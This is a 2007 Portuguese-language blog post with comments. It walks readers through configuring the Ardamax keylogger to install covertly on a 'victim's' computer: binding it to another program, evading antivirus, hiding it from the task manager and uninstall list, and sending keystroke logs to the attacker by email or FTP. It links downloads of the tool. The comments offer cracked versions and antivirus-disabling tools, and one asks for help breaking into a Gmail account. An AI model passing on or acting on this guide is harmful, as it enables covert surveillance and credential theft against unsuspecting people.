domingo, 9 de dezembro de 2007

Manual do keylogger

Bom, o Ardamax é um ótimo KEYLOGGER pra digamos, não ter erro. Se bem compactado e configurado num Joiner, nenhum antivírus pega (maioria pelo menos e comigo nunca pegaram). É mais simples, e já vou lembrar, QUANDO INSTALADO NA MÁQUINA DA VÍTIMA, os ACENTOS PARAM DE FUNCIONAR, bom, to falando isso, por que é bom avisar, não custa nada.Ta, agora, depois de aberto o Ardamax, vamos partir do principio que você não quer que ele grave as coisas ai na sua máquina. Então vai, lá no ícone perto do relógio e sai desmarcando tudo, isso só vai contar pra sua própria máquina. Pronto, agora ele não vai iniciar com o Windows nem nada. Agora vamos a parte interessante. Clique com o botão direito no ícone perto do relógio e vá em "ENGINE BUILDER", segunda opção. Isso vai criar um pequeno EXE com as suas configurações que vai instalar o ARDAMAX na máquina da vítima, camuflada-mente e começar a rodar automaticamente junto com o Windows.

Ta, pronto, depois que você clicou:

Uma telinha inútil de WELCOME, se quiser ler, leia-a, que fala o que eu acabei de falar em inglês.

NEXT.

Agora, o próprio Ardamax tem a opção de usar o Joiner, vá em "BROWSE" e selecione o aplicativo que você queira que se junte ao Server, ou não seleciona nada, se você preferir usar seu JOINER preferido. Embaixo há a opção do keylogger se instalar na pasta Windows ou W

NEXT.

A opção INVISIBILITY é a mais importante...

Vamos dar uma traduzida:

HIDE TRAY ICONE = esconder o ícone perto do relógio. MARQUE lógico.

HIDE THE PROGRAM FROM CRTL+ALT+DEL = esconder do Crlt Alt Del (Pode marcar)

REMOVE SHORTCURTS From Start Menu = não vai deixar nada lá no Iniciar da vítima, (Melhor marcar).

REMOVE DE PROGRAM FROM UISNTALTION LIST = tirar a opção de desinstalar o Ardamax pelo "ADICIONAR/REMOVER PROGRAMAS" (Melhor Marcar).

HIDE PROGRAM FOLDER = Esconder a pasta do Ardamax lá na pasta do windows ou system.

HIDE THE PROGRAM. = esconder o Ardamax da lista de programas que iniciam com o Windows. Eu não marco, por que se o cara desliga no dedão, o Ardamax não inicia junto na próxima vez. (Então isso é pessoal).

NEXT.

A parte de MAIL, você coloca lá seu e-mail e tal e SMTP no post do Perfect, tem lá como configurar... Básico.

NEXT.

Mesma coisa pra FTP, você configura seu FTP e pronto.

NEXT

Na opção security, tem lá, proteger os logs, proteger o fechamento do programa, isso tudo com uma senha que você configura. Em caso de acesso FÍSICO, tipo você instala no seu colégio, pode ate marcar e configurar uma senha, mas pra mandar pra alguém pela NET, (Vocês que sabem).

NEXT.

Nessa parte, você seleciona que o programa vai iniciar com o WINDOWS e em MODO ESCONDIDO. E é bom desativar aquelas teclas, então clica no campo "HIDDEN MOD ON" e aperta BACKSPACE, vai aparecer "Nenhum", melhor assim. Self Destruct é a opção do keylogger se auto-deletar na tal data que vocêc marcar (Cada um sabe o que quer).

NEXT.

FINISH:

Na caixa lá, você coloca o nome do arquivo que vai ser criado, desse Server que acabamos de configurar, coloca qualquer coisa, depois renomeia, tipo "Ardamaxserver", e a opção de baixo é abrir a pasta onde o Server foi criado. Pronto, só dar CONCLUIR e BINGO!

Gora, você deve compactar e tal, usar um Joiner se não quiser usar o do próprio Ardamax.

E para completar, esses Download:

ardamax key logger 2.8: http://w15.easy-share.com/8416681.html
removedor caso esteja infectado: http://w15.easy-share.com/8416551.html
e uma video aula como configurar: http://w15.easy-share.com/8423151.html

By Oliver!

5 comentários:

curso de ator disse...

no meu não tem engine builder

o meu é ardamax keylloger 2.8 o que faço??

msn:be_lmiro@hotmail.com

DETETIVE CAMPINAS disse...

DETETIVE PARTICULAR CAMPINAS
(19)3029-0762
www.andrecardelli.com.br

Unknown disse...

bom galera o ardamax keylogger 2.8 naum presta para criar severs ele naum cria baixe ai no meu site o que cria o ardamax keylogger2.41 ja vem com o cracker http://br.geocities.com/evertondesouza2/ardamax.zip meu site é evertondesouza2.4x2.net meu e-mail evertondesouza2@hotmail.com eu tenh o tutorial de como criar severs e de como camufla de todos os antivirus e tenho o AV kill para desativar antivirus e outros hackers me add ai ou vaino meu site

ewerton j. n. de souza disse...

baixe o novo ardamax 2.7 que é autoexecutavel ,captura imagem camufla-se com programas,e tem outras funções esse é o melhor mesmo http://br.geocities.com/usuarioardamax2/ardamax_2.7.zip ja vem com o cracker seria e o tutorial acesse http://www.evertondesouza2.4x2.net

Nina Dixon disse...

OLA ,PRECISO HACKER UMA CONTA DE GMAIL ,ME AJUDA OU ENSINA PLEASE ,O QUAIS PROGRAMAS PRECISO BAIXAR ... AH ESSA PESSOA USOU MEU PC ,E SEI QUE MEMSO QUE ELE NÃO TENHA CLICADO O BOX PARA SALVAR A SENHA ;EXISTE UMA FORMA DE COLETAR ESSA SENHA ATRAVÉS DE UMA HIDDEN FOLDER ,SÓ NÃO CONSIGO MAIS ACHAR O VÍDEO QUE VI ENSINANDO ISSO E DÁ CERTO ! CAN YOU HELP ME /

KISSES
YAS.